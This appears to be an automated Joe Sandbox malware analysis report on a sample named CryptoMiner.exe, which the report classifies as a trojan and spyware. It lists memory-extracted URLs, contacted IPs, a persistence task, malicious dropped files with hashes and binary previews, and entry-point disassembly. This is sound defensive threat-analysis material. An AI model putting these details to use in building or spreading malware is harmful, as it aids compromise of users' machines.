http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id15Response | InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000016.00000002.688558228.0000000007047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.696959408.000001C92E5E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id6Response | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ip.sb/ip | CryptoMiner.exe, 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, CryptoMiner.exe, 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/sc | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id9Response | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id20 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id21 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.dr | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id22 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1 | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id23 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1 | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id24 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id24Response | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.659905866.0000000002FA6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id1Response | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.symauth.com/cps0( | fname.exe.12.dr | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.symauth.com/rpa00 | fname.exe.12.dr | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/trust | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id10 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id11 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id12 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id16Response | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id13 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id14 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id15 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id16InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/NonceInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id17InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id18InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id5ResponseInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.657986199.0000000002DFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id19InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id10ResponseInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RenewInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://tempuri.org/Entity/Id8ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://ocsp.sectigo.com0InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
Legend (share of contacted IPs per ASN):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-AS (US) | false
65.21.213.209 | unknown | United States | 199592 | CP-AS (DE) | true
45.9.20.31 | unknown | Russian Federation | 35913 | DEDIPATH-LLC (US) | false
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 620659
Start date and time: 2022-05-05 03:28:10 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 45s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: CryptoMiner.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@15/5@1/3
EGA Information:
• Successful, ratio: 66.7%
HDC Information:
• Successful, ratio: 32.9% (good quality ratio 30.7%)
• Quality average: 77%
• Quality standard deviation: 28.4%
HCA Information:
• Successful, ratio: 71%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 20.42.73.29
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
• Execution Graph export aborted for target filename.exe, PID 4584 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4036 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: CryptoMiner.exe
Time | Type | Description
03:30:46 | API Interceptor | 85x Sleep call for process: InstallUtil.exe modified
03:31:21 | API Interceptor | 11x Sleep call for process: powershell.exe modified
03:31:44 | Task Scheduler | Run new task: chrome path: C:\Users\user\AppData\Roaming\Chrome\chrome.exe
No context
No context
No context
No context
No context
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2932
Entropy (8bit): 5.334469918014252
Encrypted: false
SSDEEP: 48:MxHKXeHKlEHU0YHKhQnouHIWUfHK7HKhBHKdHKB1AHKzvQTHmtHoxHImHK1HjHKv:iqXeqm00YqhQnouOq7qLqdqUqzcGtIx7
MD5: 02054701434F73C34E5333237A4CA701
SHA1: CC1A321DC8C9217A236E29B9811C37E6F50032B9
SHA-256: 49F5D3693BA0F7484CE457258C12B6C95D670D5E78B9C602EBA68F134DEB7F9D
SHA-512: A30F45328A78ED712E366FDF1F57F9B2CF4BB3A120747BDD26DADDAE932B37B9C0C839CE9EDB10650506DA95D5FF4946E624D5A442B24D59E288FEC9C712E8BF
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 4879360
Entropy (8bit): 7.9984899222641435
Encrypted: true
SSDEEP: 98304:mQi4NSWhwXCzdRTm4OVgThNEUdhgjcAwLgq+a6T8g/Ztr4JIs/:Hi4U+rTmoNEUfWcAZ5TPZtr4WK
MD5: C108EBDD14A2CF40E64411792987796A
SHA1: 48F4F5376D0A571784FA03F89015C6A72F74998D
SHA-256: F9BFF1AC8E6C15DDE928E87A8BF733006CA805D42302387B2C24E11E555B7EE6
SHA-512: CFE4079D70F380AD98CC44CD9F05500FF8AF79421EA32012B873425BBF045D2DA8F9B7942941655FABB64E66D6CEBDDD174FA4C3C3C3ABC54B120CAD6E261E07
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 29%
• Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...S.ab.........."......lJ.............. .....@..... ........................J...........@...@......@............... ................................J.............................................................................................. ..H............text....kJ.. ...lJ................. ..`.rsrc.........J......nJ.............@..@........................................H.........I.........;........................................................O...3.....7H.....!%..g...{.N..?..y.....3.....n..9.]'....U].8W8..4:..)....9.P.rd.."o~n....K..*....an.......vE...`/N...^...H.......ne.'..W..\T....@.[...F.2...c]..u..I.g.M.. $.>..w.Il@! =;.j..-..d .\4..G@=..p?.B7...C.k.Jz...2r~.`.m.......In]...d...Q..]."...fI.u.....,.9..pZ..B.iIj........;c.<3.e>.y..g....TfZ.M..&&@!^_...m...FI.3.{Ne..2:.Rd.o.......f33.|.........~.....62......:.oj...p.(dJ..g
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3677592
Entropy (8bit):6.364458086173346
Encrypted:false
SSDEEP:98304:xjFJEyX5ZYpLKwYXA8NMLgJ0CYkL1N5qV0O8:ZFSyJZ8LYEgCCYkDxO8
MD5:C61F9A9059F8B8BD0E69F7DF4CB09786
SHA1:70FFFDE0DEBF4559859617D49DC48C54DF3C156D
SHA-256:84A5A26F1748C3AD1F0B98C438908E8DC842EACC6390484527EE1FE7E56264F5
SHA-512:6A838D9663517E1F89BF47F9BA85B72CD431F0D61C4DB97E69516FFA313D8BDFC9F619EB51EAD5215786E523B43CDE3186300CF3BFAB7408D580C66CD7D00453
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 31%
• Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k\8./=V./=V./=V.;VU.!=V.;VS..=V.;VR.9=V.}HR.>=V.}HU.;=V.}HS.e=V.;VW.*=V./=W.r=V..HS..=V..HT..=V.Rich/=V.........................PE..L...)........................J.......0"...........@.............W.............7...........@.................................9`..P.....7.............h.7.0I..........................................................................................JICeboQ.5^.......`..........a...c... ..`zcPlt...uP...p...R...d..m.......}.T. ..`rrF5ta......................?.......@..@IKbga.............................[.@...03AAoc...-..................W.....2.@..B6maTqw...@... ...@..................@...PKmYta.......`.......(..\...O.....=.@...gTx1qw...`"..p...`"..*..>...u...9...`...9YRtc.........7.......7.k.......\...@..@........................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.935706403073255
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:CryptoMiner.exe
File size:1579064
MD5:310eb5bd45ac9c5767d28e63ab64635b
SHA1:4ac0d40abb71e9fcff34c8f67511fc590f495f3e
SHA256:d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6
SHA512:c2b0c3e890bb92f527960230c97c9c75ce50a2b9c4186c1dea87f7e55892702ac82805e5a038b8d32614790357c3ad113afe63e7f77cc99866801f4fdbac5e97
SSDEEP:24576:07L4j8tb74F0xt7ruJV/QujUOycEvgyJrDybsxXX+ZVGNVooHI9s5KCfj2:07L4jIIct7w/QujMvOgUwLoKIG2
TLSH:EC75ADB7384C859AE91B8E70C834E6620B5F9D238F55089652DC3DA7B83B1F0647DD8B
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q*.p?y.p?y.p?yq>.y.p?y...y.p?y...y.p?y...yep?y...y.p?y.p>y.p?y...y.p?y...y.p?yRich.p?y........................PE..L...X.rb...
Icon Hash:f0c6cac9ecb6cccc
Entrypoint:0x429132
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x6272C458 [Wed May 4 18:22:16 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:efad26290bf4d1a676b7ad79139e8cdb
Signature Valid:false
Signature Issuer:CN=Certum Domain Validation CA SHA2, OU=Certum Certification Authority, O=Unizeto Technologies S.A., C=PL
Signature Validation Error:A certificate chain could not be built to a trusted root authority
Error Number:-2146762486
Not Before, Not After:
• 9/28/2021 8:03:57 AM 10/28/2022 8:03:56 AM
Subject Chain:
• CN=*.elo.com
Version:3
Thumbprint MD5:EAB698D40D1FA25789A10E55422B5372
Thumbprint SHA-1:A5A560E22CA4075C52801E63977DA1FC5D798829
Thumbprint SHA-256:FF8F3AD6662949E8FEB753DAA023FC4DDEFE4C275BB98BCB9CFA1D225CBCBEA8
Serial:01CA3A6DBD89E3BA09A6983260FE8F96
Instruction:
call 00007F8F2CCE6AFFh
jmp 00007F8F2CCDFA7Eh
push dword ptr [005235E8h]
call dword ptr [00401068h]
test eax, eax
je 00007F8F2CCDFBF4h
call eax
push 00000019h
call 00007F8F2CCE5F53h
push 00000001h
push 00000000h
call 00007F8F2CCE30DFh
add esp, 0Ch
jmp 00007F8F2CCE30A4h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040146Ch
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F8F2CCDFBFEh
test byte ptr [eax], 00000008h
je 00007F8F2CCDFBF9h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0040108Ch]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, dword ptr fs:[00000000h]
Programming Language:
• [ASM] VS2010 build 30319
• [LNK] VS2010 build 30319
• [ C ] VS2010 build 30319
• [IMP] VS2008 SP1 build 30729
• [C++] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11fba0 | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x128000 | 0x5c37c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x180400 | 0x1438 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x125000 | 0x1980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11e0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6a28 | 0x40 | .text
